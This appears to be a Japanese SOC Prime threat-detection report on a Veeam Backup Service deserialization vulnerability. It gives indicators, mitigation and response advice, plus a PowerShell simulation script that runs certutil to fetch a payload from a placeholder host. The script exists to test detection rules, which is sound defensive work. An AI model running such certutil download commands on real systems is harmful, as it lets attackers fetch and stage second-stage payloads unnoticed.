SOC Prime Bias: クリティカル

10 Jul 2026 18:16 UTC

CVE-2026-44963:Veeamバックアップサービスの悪用の指標

Author Photo
SOC Prime Team linkedin icon フォローする
CVE-2026-44963:Veeamバックアップサービスの悪用の指標
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

概要

このレポートは、Veeam Backup ServiceにおけるCVE-2026-44963に関連するコンプロマイズ指標を示しています。この脆弱性は、安全でないデシリアライズを通じてリモートコードの実行を可能にするものです。攻撃者はこの欠陥を悪用し、Veeamサービスから不審な子プロセスを起動する可能性があります。この結果としての活動は、不正なアクセスにつながり、ネットワーク全体での横移動の機会を生み出す可能性があります。

調査

調査は、不審な子プロセスが Veeam.Backup.Service.exeによって生成される場合を検出することに焦点を当てています。これには以下のツールが含まれます: cmd.exe or powershell.exeおよび、Veeam関連ポートにおける異常なネットワーク活動の識別を行います。アナリストは、Veeamディレクトリ内の不正なログオンイベントおよび予期しないファイル変更にも注意を払う必要があります。

緩和策

リスクを軽減するために、管理者はVeeam Backup & Replicationを、安全でないデシリアライズの欠陥を解決するバージョンに更新すべきです。ファイアウォールポリシーはVeeamポート 9392-9419へのアクセスを厳密に制限し、防御者は非管理者ドメインユーザーによるこれらのサービスへの認証を監視すべきです。サービスアカウントは最小特権の原則に従って制限されるべきです。

対応策

不審な活動が検出された場合、影響を受けたVeeamサーバーを直ちにネットワークから隔離すべきです。調査者は、プロセス実行ログ(イベントID 4688 およびSysmonテレメトリを含む)並びにネットワーク接続記録を確認して、侵害の範囲を決定する必要があります。最近のアカウント活動を監査し、疑わしい侵入期間中に関与したアカウントの資格情報をリセットする必要があります。

攻撃フロー

シミュレーション実行

前提条件: テレメトリとベースラインの事前検査が合格している必要があります。

根拠: このセクションでは、検出ルールをトリガするために設計された敵対者の技術 (TTP) の正確な実行を詳述しています。コマンドと記述は特定されたTTPを直接反映し、検出ロジックによって期待されるテレメトリを正確に生成することを目的としています。抽象的または無関係な例は誤診につながります。

  • 攻撃の物語とコマンド: 敵対者は、Veeam Backup Serviceの脆弱性(シミュレーション)をターゲットとして実行権限を取得します。第2段階のペイロードをダウンロードする際に低キーを維持するため、攻撃者はハイジャックしたVeeamプロセスを使用して certutil.exe、一般的なLiving-off-the-Landバイナリを起動し、リモートファイルを取得します。この動作は検出ルールの process_creation ロジックをトリガすることを意図しています。

  • 回帰テストスクリプト:

    # シミュレーション開始: このスクリプトは、Veeamサービスが不審なプロセスを起動する様子をシミュレートします。
    # 注: 管理者/システムの権限なしにVeeamサービス『になる』ことが容易でないため、
    # テレメトリを模倣するダミープロセスを作成することでシミュレーションします。
    
    $VeeamPath = "C:Program FilesVeeamBackup and ReplicationBackupVeeam.Backup.Service.exe"
    $TargetBinary = "certutil.exe"
    
    Write-Host "[+] $VeeamPathからの不審な子プロセスをシミュレーション中" -ForegroundColor Cyan
    
    # 実際の環境では、脆弱性がこのサービスを呼び出す原因となります。
    # 検証のためにプロセスをトリガします。Sigmaルールの
    # 「ParentImage」要件に厳密に一致させるためには、テスト者は手動でプロセスをリネームするか
    # 特定のEDRをテストしている場合は、ツールを使用して親プロセスID(PPID)を偽装する必要があります。
    
    Start-Process -FilePath $TargetBinary -ArgumentList "/urlcache /f https://example.com/payload.txt" -WindowStyle Hidden
    
    Write-Host "[+] シミュレーションコマンドを実行しました。" -ForegroundColor Green
  • クリーンアップコマンド:

    # シミュレーションで作成された一時ファイルを削除します
    Remove-Item -Path "C:pathtosimulatedpayload.txt" -ErrorAction SilentlyContinue
    Stop-Process -Name "certutil" -ErrorAction SilentlyContinue